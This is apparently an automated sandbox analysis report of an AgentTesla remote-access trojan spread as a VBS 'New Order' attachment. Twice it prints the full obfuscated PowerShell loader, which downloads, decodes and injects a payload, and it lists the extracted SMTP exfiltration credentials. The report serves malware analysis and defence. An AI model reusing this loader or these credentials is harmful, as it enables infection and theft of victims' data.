Analysis
-
max time kernel
149s -
max time network
103s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
01-07-2024 10:04
General
-
Target
New Order CHAL-0435.vbs
-
Size
449KB
-
MD5
5a0dbe0c7eec32795de4a14bec5ee17a
-
SHA1
43bf04fe61e07486b4fba98e2ef454f12b88c8b4
-
SHA256
8ac3582b0025c26878a6ba3337703974f6517448af31f59d0aec023569e5e8d2
-
SHA512
3d183693d757a57620b167a1b6dd7a734967fd1ddc64f77a67232db24114de72af0f393eb7531038dc5a55d461be90ddc2c767001ec330bbb28e9a31250f4b4c
-
SSDEEP
6144:OZvdxaOaFt7Fu/crHZ4CiGu7cD4Z4p1ubCwxg7Qo1UbV5LGrvvVvBHhDlWlme0KN:OxgdLMNQ+yE
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
ysmglobalsourcing.com - Port:
587 - Username:
[email protected] - Password:
YSM$2024 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New Order CHAL-0435.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Trkkerdrenges Britchel Prereturn Klatmaler Juvels Sovsekandernes198 Kirkinhead Potentialet Brddestablers Fibroses Sukrende Uncockneyfy Catchiness Ymca Pensionister distoclusion Formueforhold253 Teias Unpatrolled Verdensdamers Flyvebaaden Barkeeps229 Kretekniskes Unedacious115 Trkkerdrenges Britchel Prereturn Klatmaler Juvels Sovsekandernes198 Kirkinhead Potentialet Brddestablers Fibroses Sukrende Uncockneyfy Catchiness Ymca Pensionister distoclusion Formueforhold253 Teias Unpatrolled Verdensdamers Flyvebaaden Barkeeps229 Kretekniskes Unedacious115';If (${host}.CurrentCulture) {$Unthrowable++;}Function Ignorering($Crustade){$Outbabbled=$Crustade.Length-$Unthrowable;$Cystoenterocele='SUBsTRI';$Cystoenterocele+='ng';For( $Dispositionsdatoen=2;$Dispositionsdatoen -lt $Outbabbled;$Dispositionsdatoen+=3){$Trkkerdrenges+=$Crustade.$Cystoenterocele.Invoke( $Dispositionsdatoen, $Unthrowable);}$Trkkerdrenges;}function Eduard($Trachelectomy){ & ($Desynchronising) ($Trachelectomy);}$Ophve=Ignorering 'RaMS.o.rzGuiAnl alTra r/Sp5Re.De0So L(,iW,oiAfnAudCooelw ,s B RNSkT G Pi1T,0U .V,0Wh;Ob BlW SiNanSl6 U4Ou;Sa Axud6To4 .;Po I.rUnvFl:Lo1 ,2Ma1H .D 0Gl)U. MiG SePsc.rk PoOr/Al2G,0 ,1 E0 e0 1,o0 ,1.v UnF oi Sr Se .fAuoOvxPr/ B1 T2 a1 D.Pr0 n ';$Selvbetjeningsbutikkernes=Ignorering ' ,UAjs UeMorFi-NeAPog eDinKot a ';$Juvels=Ignorering ' RhSltBatTvpPus.e:Sk/P /DedParTeiG,vMeeAl.NugD oSpoNogq.lG,eS . CcPro NmSe/ReuFlcVa?.ee,ex.ypGyoRerUdt,a=OvdKuoanwFon.nlFloRea dKo&EfiTrdO =Hu1 bY CL lq rSae,rdPlVry_G rTraA 7 eg o3Ept Ll .6S.0BaM,ecCa1.riLaQEmoInCS,FInnVem rwMas APDekD,SK ';$Fremtidsforskeren=Ignorering ' w> C ';$Desynchronising=Ignorering 'MaiGeeEtxCh ';$Tridimensional='Potentialet';$Modstandsorganisationen = Ignorering ' PeBrcKlhT,o,l Sp%.naDapO.pOmd.iaPotIraCi%Vu\U.TSarMueEfnTrc mhSve BrSts di,hd BeLl.FyAFon,rn C K&S,& h peViccih,eore .tSt ';Eduard (Ignorering 'Ga$ ogFil so.ab DaSalJa:H FMilBrynov Ue ,mCha fs KkTaiAfnLae L=Om( RcdkmInd,t Lu/NocI Me$.iM MoFldResudt.ea ,n Sd Fs voS rExg eaBunPhiNos AaVat.aiUno Cn UePon C),o ');Eduard (Ignorering 'An$ sg ,l PoDibK.a ul ,:.aK bl.yaD,t.om TaT,lSee LrN,= e$tiJSkuC v ,e,llGasFi.caslip,ol DiBltPa( ,$,uF Ur ,erom LtPeiGadS,sOkf ao,orafs,rkUpeRdrDoeSun .)In ');Eduard (Ignorering ' f[,sN.ieBrt,a.CuS.ee ir v,ki.pc DePoP ,o.eiShn rtTrMBlaFrnV aTrgSueAsrSc]Te:K :ViSRee CcP,uKarDeiSit.rySkPBerR,oUntD.o cKro ClF. E.=Se Un[,lN .eD,t t.PaS SeJocKnukaru.iT.tTaystP rOpo st,to .cS,oSylTiTF,yA.pOve ] ,:Yv:FoTPelTrs.a1 2st ');$Juvels=$Klatmaler[0];$Knobene= (Ignorering 'Fo$DigDvl vo SbH,aD.l.e: AH DyFep Fofop iyNegTaiSwaVilFl2 a3Sl7To=FaNS eFawMi-FoO Pb,ljMeei.c,etL. .Sdey BsInt.oeU mCh.S,N.leNit,o..oW.ee ebC.CCelHeiDee.bn Ut');$Knobene+=$Flyvemaskine[1];Eduard ($Knobene);Eduard (Ignorering 'br$DnHOmyPep UoBep .yV,gReiNaaSpl 2A 3Sy7Do. iHVies aThdMeeFjrGasL [ $AfSFoe.rl IvCabGeeFit j He Ent.iL,nFag DsA,b ,ua tDii LkFrkIne arRen.ieKrsSs]Ru=,i$u OUnpOvh Cv .ePa ');$Dislicence=Ignorering 'Sy$ApHSoyMcpImoVop RyAdg SiEnaB,lFr2Su3S 7In.PaDAnoTowP,n sljoo AaUndOpFAbi sl pe,o( e$PyJ.yuMavCheGul Csen,Hv$SvBEra rExkH eCoeSep sMa2Na2.k9Tr)Lb ';$Barkeeps229=$Flyvemaskine[0];Eduard (Ignorering 'Bl$ gWhlTaoSab .aAal.e:UnAPec rEgoBrc eeH.n tLirS iSecBo=Co(FoTTee Ss tLn-SpP RaLntInh.o Su$ZaB .aStr pkMee eQupBasbl2Sk2un9De)Io ');while (!$Acrocentric) {Eduard (Ignorering ' D$Mag Slreo,ob aAdlBu: FP ArFaofosFltElaBusLu= S$ButPorMiu .e o ') ;Eduard $Dislicence;Eduard (Ignorering ' nShjt.ta Sr tPl- gSB.lEkeVoe vpVe .4 O ');Eduard (Ignorering ' S$StgbrlM,oPhb ta.klLi:AkAUnc OrWaolacUpeAnn ut BrTeiAgcFi=Ty( ST,neBes tEr- TP .aIrt MhNa E $R.Bcoa arE kP e EeD pShsCo2,i2M.9B.),o ') ;Eduard (Ignorering 'Or$UdgAll coBlbSgaP,lWi:FePcyrMoeE r PeCotDouWirs,nNa=Dy$Beg Vl oTrbFlaE,lSa:GrBU.r aiKat.ncOvh .eR,l B+Fa+G,%Ou$ rKPalU,a Ct rm ,a Rl ke ,r K.V,c eo LuS,n StSe ') ;$Juvels=$Klatmaler[$Prereturn];}$Dispositionsdatoenndianism=289154;$Cade=25625;Eduard (Ignorering '.o$BrgFrlCuo Rb aaArlUn:DaBserCad,ed .e KsFytKoa Eb ,lKre Fr.ms hi=G. CuGVeeCit U-P.C RoAtnB tSleStnG,t B s,$ HB aKhr jkKoeC,eP,pFus A2st2Cy9.a ');Eduard (Ignorering ' .$ Pgtal GoInbD aT.l :A,MAmiChsG.fFde Sa DssuaFuns c IePr ,o=Un In[S SBiyTysPhtg,eEnmNu. kC.ro.anC.v ke ,r tIn]Sp: F:e.F ,rV oS.mOlBIma.asE,eSo6Bo4MaS tkarGai PnTag F(Sk$ eBD,rPldSldTue s,rtSaap,bFllD.eCyrnos,e),u ');Eduard (Ignorering ' A$ Og ol,eoK,bCoaFrlEn:CiU .nLyc Oo dc ,k nH eDey tfR ySk t=S. h[ DSApyKasT,tFee nm.o.DaT.kenoxK,tSe. ,E,rnIlcSeoSedini Ln.xg ]gu:Pa: lAUnSRoCKaI IINo.ChGFreCitEtSO tSprouiSan gE ( a$InMF.i GsT.f TeB.aN.sMaaAfnAgc.aeDj)U, ');Eduard (Ignorering 'Ab$ FgMal SoCibStaTgl S: MVScamers.eVrp CrTosKoeG,nPutLaaKstF ikioalnKls .=Sa$ViUovnStcPaoDec .k nLyedeySufany C.misPau AbTes.ytMarE.iS nUtgMi(Sp$PoD pi RsDepMooKos Mi t Mi ,oC.nResKod.daEmt oBoe SnHanBidSviS.a .n FiDysa.m ,, A$BeC ca Nd ,est)Su ');Eduard $Vareprsentations;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trencherside.Ann && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Trkkerdrenges Britchel Prereturn Klatmaler Juvels Sovsekandernes198 Kirkinhead Potentialet Brddestablers Fibroses Sukrende Uncockneyfy Catchiness Ymca Pensionister distoclusion Formueforhold253 Teias Unpatrolled Verdensdamers Flyvebaaden Barkeeps229 Kretekniskes Unedacious115 Trkkerdrenges Britchel Prereturn Klatmaler Juvels Sovsekandernes198 Kirkinhead Potentialet Brddestablers Fibroses Sukrende Uncockneyfy Catchiness Ymca Pensionister distoclusion Formueforhold253 Teias Unpatrolled Verdensdamers Flyvebaaden Barkeeps229 Kretekniskes Unedacious115';If (${host}.CurrentCulture) {$Unthrowable++;}Function Ignorering($Crustade){$Outbabbled=$Crustade.Length-$Unthrowable;$Cystoenterocele='SUBsTRI';$Cystoenterocele+='ng';For( $Dispositionsdatoen=2;$Dispositionsdatoen -lt $Outbabbled;$Dispositionsdatoen+=3){$Trkkerdrenges+=$Crustade.$Cystoenterocele.Invoke( $Dispositionsdatoen, $Unthrowable);}$Trkkerdrenges;}function Eduard($Trachelectomy){ & ($Desynchronising) ($Trachelectomy);}$Ophve=Ignorering 'RaMS.o.rzGuiAnl alTra r/Sp5Re.De0So L(,iW,oiAfnAudCooelw ,s B RNSkT G Pi1T,0U .V,0Wh;Ob BlW SiNanSl6 U4Ou;Sa Axud6To4 .;Po I.rUnvFl:Lo1 ,2Ma1H .D 0Gl)U. MiG SePsc.rk PoOr/Al2G,0 ,1 E0 e0 1,o0 ,1.v UnF oi Sr Se .fAuoOvxPr/ B1 T2 a1 D.Pr0 n ';$Selvbetjeningsbutikkernes=Ignorering ' ,UAjs UeMorFi-NeAPog eDinKot a ';$Juvels=Ignorering ' RhSltBatTvpPus.e:Sk/P /DedParTeiG,vMeeAl.NugD oSpoNogq.lG,eS . CcPro NmSe/ReuFlcVa?.ee,ex.ypGyoRerUdt,a=OvdKuoanwFon.nlFloRea dKo&EfiTrdO =Hu1 bY CL lq rSae,rdPlVry_G rTraA 7 eg o3Ept Ll .6S.0BaM,ecCa1.riLaQEmoInCS,FInnVem rwMas APDekD,SK ';$Fremtidsforskeren=Ignorering ' w> C ';$Desynchronising=Ignorering 'MaiGeeEtxCh ';$Tridimensional='Potentialet';$Modstandsorganisationen = Ignorering ' PeBrcKlhT,o,l Sp%.naDapO.pOmd.iaPotIraCi%Vu\U.TSarMueEfnTrc mhSve BrSts di,hd BeLl.FyAFon,rn C K&S,& h peViccih,eore .tSt ';Eduard (Ignorering 'Ga$ ogFil so.ab DaSalJa:H FMilBrynov Ue ,mCha fs KkTaiAfnLae L=Om( RcdkmInd,t Lu/NocI Me$.iM MoFldResudt.ea ,n Sd Fs voS rExg eaBunPhiNos AaVat.aiUno Cn UePon C),o ');Eduard (Ignorering 'An$ sg ,l PoDibK.a ul ,:.aK bl.yaD,t.om TaT,lSee LrN,= e$tiJSkuC v ,e,llGasFi.caslip,ol DiBltPa( ,$,uF Ur ,erom LtPeiGadS,sOkf ao,orafs,rkUpeRdrDoeSun .)In ');Eduard (Ignorering ' f[,sN.ieBrt,a.CuS.ee ir v,ki.pc DePoP ,o.eiShn rtTrMBlaFrnV aTrgSueAsrSc]Te:K :ViSRee CcP,uKarDeiSit.rySkPBerR,oUntD.o cKro ClF. E.=Se Un[,lN .eD,t t.PaS SeJocKnukaru.iT.tTaystP rOpo st,to .cS,oSylTiTF,yA.pOve ] ,:Yv:FoTPelTrs.a1 2st ');$Juvels=$Klatmaler[0];$Knobene= (Ignorering 'Fo$DigDvl vo SbH,aD.l.e: AH DyFep Fofop iyNegTaiSwaVilFl2 a3Sl7To=FaNS eFawMi-FoO Pb,ljMeei.c,etL. .Sdey BsInt.oeU mCh.S,N.leNit,o..oW.ee ebC.CCelHeiDee.bn Ut');$Knobene+=$Flyvemaskine[1];Eduard ($Knobene);Eduard (Ignorering 'br$DnHOmyPep UoBep .yV,gReiNaaSpl 2A 3Sy7Do. iHVies aThdMeeFjrGasL [ $AfSFoe.rl IvCabGeeFit j He Ent.iL,nFag DsA,b ,ua tDii LkFrkIne arRen.ieKrsSs]Ru=,i$u OUnpOvh Cv .ePa ');$Dislicence=Ignorering 'Sy$ApHSoyMcpImoVop RyAdg SiEnaB,lFr2Su3S 7In.PaDAnoTowP,n sljoo AaUndOpFAbi sl pe,o( e$PyJ.yuMavCheGul Csen,Hv$SvBEra rExkH eCoeSep sMa2Na2.k9Tr)Lb ';$Barkeeps229=$Flyvemaskine[0];Eduard (Ignorering 'Bl$ gWhlTaoSab .aAal.e:UnAPec rEgoBrc eeH.n tLirS iSecBo=Co(FoTTee Ss tLn-SpP RaLntInh.o Su$ZaB .aStr pkMee eQupBasbl2Sk2un9De)Io ');while (!$Acrocentric) {Eduard (Ignorering ' D$Mag Slreo,ob aAdlBu: FP ArFaofosFltElaBusLu= S$ButPorMiu .e o ') ;Eduard $Dislicence;Eduard (Ignorering ' nShjt.ta Sr tPl- gSB.lEkeVoe vpVe .4 O ');Eduard (Ignorering ' S$StgbrlM,oPhb ta.klLi:AkAUnc OrWaolacUpeAnn ut BrTeiAgcFi=Ty( ST,neBes tEr- TP .aIrt MhNa E $R.Bcoa arE kP e EeD pShsCo2,i2M.9B.),o ') ;Eduard (Ignorering 'Or$UdgAll coBlbSgaP,lWi:FePcyrMoeE r PeCotDouWirs,nNa=Dy$Beg Vl oTrbFlaE,lSa:GrBU.r aiKat.ncOvh .eR,l B+Fa+G,%Ou$ rKPalU,a Ct rm ,a Rl ke ,r K.V,c eo LuS,n StSe ') ;$Juvels=$Klatmaler[$Prereturn];}$Dispositionsdatoenndianism=289154;$Cade=25625;Eduard (Ignorering '.o$BrgFrlCuo Rb aaArlUn:DaBserCad,ed .e KsFytKoa Eb ,lKre Fr.ms hi=G. CuGVeeCit U-P.C RoAtnB tSleStnG,t B s,$ HB aKhr jkKoeC,eP,pFus A2st2Cy9.a ');Eduard (Ignorering ' .$ Pgtal GoInbD aT.l :A,MAmiChsG.fFde Sa DssuaFuns c IePr ,o=Un In[S SBiyTysPhtg,eEnmNu. kC.ro.anC.v ke ,r tIn]Sp: F:e.F ,rV oS.mOlBIma.asE,eSo6Bo4MaS tkarGai PnTag F(Sk$ eBD,rPldSldTue s,rtSaap,bFllD.eCyrnos,e),u ');Eduard (Ignorering ' A$ Og ol,eoK,bCoaFrlEn:CiU .nLyc Oo dc ,k nH eDey tfR ySk t=S. h[ DSApyKasT,tFee nm.o.DaT.kenoxK,tSe. ,E,rnIlcSeoSedini Ln.xg ]gu:Pa: lAUnSRoCKaI IINo.ChGFreCitEtSO tSprouiSan gE ( a$InMF.i GsT.f TeB.aN.sMaaAfnAgc.aeDj)U, ');Eduard (Ignorering 'Ab$ FgMal SoCibStaTgl S: MVScamers.eVrp CrTosKoeG,nPutLaaKstF ikioalnKls .=Sa$ViUovnStcPaoDec .k nLyedeySufany C.misPau AbTes.ytMarE.iS nUtgMi(Sp$PoD pi RsDepMooKos Mi t Mi ,oC.nResKod.daEmt oBoe SnHanBidSviS.a .n FiDysa.m ,, A$BeC ca Nd ,est)Su ');Eduard $Vareprsentations;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trencherside.Ann && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwi5xwsf.3h5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Trencherside.AnnFilesize
409KB
MD5f256ab497377b25602e10bcbdeb835eb
SHA1178dfd52025d4953117d3cd254271660c1b72bb8
SHA256565c64deaeefba88a078b1eb276864e885084f9fea655881c90444138181ff45
SHA512b57d0b59762255fec048cf16cecf6c5f3da7ba05e6ab02d25b5da26246575b3dc0fa6e83c77e001f6c6324fc2276574c5ef15ef5b35f407f6fc9c7d948a3fa9c
-
memory/876-1-0x000002793EDD0000-0x000002793EDF2000-memory.dmpFilesize
136KB
-
memory/876-11-0x00007FFFC7650000-0x00007FFFC8111000-memory.dmpFilesize
10.8MB
-
memory/876-12-0x00007FFFC7650000-0x00007FFFC8111000-memory.dmpFilesize
10.8MB
-
memory/876-59-0x00007FFFC7650000-0x00007FFFC8111000-memory.dmpFilesize
10.8MB
-
memory/876-41-0x00007FFFC7650000-0x00007FFFC8111000-memory.dmpFilesize
10.8MB
-
memory/876-0-0x00007FFFC7653000-0x00007FFFC7655000-memory.dmpFilesize
8KB
-
memory/876-40-0x00007FFFC7653000-0x00007FFFC7655000-memory.dmpFilesize
8KB
-
memory/944-17-0x0000000005330000-0x0000000005352000-memory.dmpFilesize
136KB
-
memory/944-19-0x0000000005B90000-0x0000000005BF6000-memory.dmpFilesize
408KB
-
memory/944-30-0x00000000061D0000-0x00000000061EE000-memory.dmpFilesize
120KB
-
memory/944-31-0x0000000006200000-0x000000000624C000-memory.dmpFilesize
304KB
-
memory/944-32-0x0000000007B60000-0x00000000081DA000-memory.dmpFilesize
6.5MB
-
memory/944-33-0x0000000006750000-0x000000000676A000-memory.dmpFilesize
104KB
-
memory/944-34-0x00000000074E0000-0x0000000007576000-memory.dmpFilesize
600KB
-
memory/944-35-0x0000000007420000-0x0000000007442000-memory.dmpFilesize
136KB
-
memory/944-36-0x00000000081E0000-0x0000000008784000-memory.dmpFilesize
5.6MB
-
memory/944-29-0x0000000005D00000-0x0000000006054000-memory.dmpFilesize
3.3MB
-
memory/944-38-0x0000000008790000-0x000000000CF7F000-memory.dmpFilesize
71.9MB
-
memory/944-18-0x0000000005A30000-0x0000000005A96000-memory.dmpFilesize
408KB
-
memory/944-16-0x0000000005400000-0x0000000005A28000-memory.dmpFilesize
6.2MB
-
memory/944-15-0x0000000002890000-0x00000000028C6000-memory.dmpFilesize
216KB
-
memory/4396-56-0x0000000000A50000-0x0000000000AC6000-memory.dmpFilesize
472KB
-
memory/4396-54-0x0000000000A50000-0x0000000001CA4000-memory.dmpFilesize
18.3MB
-
memory/4396-62-0x0000000024970000-0x00000000249C0000-memory.dmpFilesize
320KB
-
memory/4396-63-0x0000000025060000-0x00000000250F2000-memory.dmpFilesize
584KB
-
memory/4396-64-0x00000000249C0000-0x00000000249CA000-memory.dmpFilesize
40KB